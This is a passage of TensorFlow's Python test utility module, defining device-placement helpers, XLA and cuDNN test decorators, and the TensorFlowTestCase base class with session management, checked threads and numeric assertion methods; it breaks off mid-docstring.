@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
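# Illustrative usage sketch of the device-placement helpers above (the op and
# tensor names are placeholders):
#
#   with use_gpu():          # runs on GPU when one is available, else CPU
#     y = math_ops.matmul(a, b)
#   with force_cpu():        # always pinned to /device:CPU:0
#     z = math_ops.reduce_sum(y)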
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used to
# signal completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def use_deterministic_cudnn(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CUDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = os.environ.get("TF_CUDNN_DETERMINISTIC", "")
os.environ["TF_CUDNN_DETERMINISTIC"] = "true"
result = f(self, *args, **kwargs)
os.environ["TF_CUDNN_DETERMINISTIC"] = original_var
return result
return decorated
if func is not None:
return decorator(func)
return decorator
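# Illustrative usage sketch (hypothetical test method): disabling cuDNN
# autotuning so repeated graph builds stay isomorphic.
#
#   class MyConvTest(test_util.TensorFlowTestCase):
#
#     @test_util.use_deterministic_cudnn
#     def test_conv_graph_is_stable(self):
#       ...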
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tensorflow.TF_GetXlaConstantFoldingDisabled()
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
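# Illustrative usage sketch: applying a method-level decorator to every test
# method of a class at once (the decorated class is hypothetical).
#
#   @test_util.for_all_test_methods(test_util.disable_xla,
#                                   "not compatible with XLA")
#   class MyNonXlaSuite(test_util.TensorFlowTestCase):
#
#     def test_one(self):
#       ...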
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tensorflow.TF_SetXlaAutoJitMode("2")
pywrap_tensorflow.TF_SetXlaMinClusterSize(1)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(False)
pywrap_tensorflow.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoid calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This ensures that tests from different runs cannot pollute each
other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another protobuf message of the same type as `message`, parses the
ASCII representation into it, and then compares them using
self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
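# Illustrative usage sketch: `evaluate` works both eagerly and in graph mode,
# so the same assertion can be shared by v1- and v2-style tests.
#
#   def test_add(self):
#     result = self.evaluate(math_ops.add(1, 2))
#     self.assertEqual(result, 3)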
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently from self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the tearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminated due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
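# Illustrative usage sketch: assertions made inside a checked thread are
# surfaced when the thread is joined (the worker function is hypothetical).
#
#   def test_concurrent_work(self):
#     def worker():
#       self.assertGreater(compute_something(), 0)
#     t = self.checkedThread(target=worker)
#     t.start()
#     t.join()  # re-raises any failure recorded inside `worker`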
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if that does not work, then
# traverse through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
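# Illustrative usage sketch: the effective tolerance follows the least precise
# of the two dtypes, so the fp16 comparison below uses the half_* tolerances
# (the numeric values are made up).
#
#   a = np.array([1.0, 2.0], dtype=np.float16)
#   b = np.array([1.0005, 2.0005], dtype=np.float16)
#   self.assertAllCloseAccordingToType(a, b)   # passes under half_atol=1e-3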
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b, msg)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements")
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
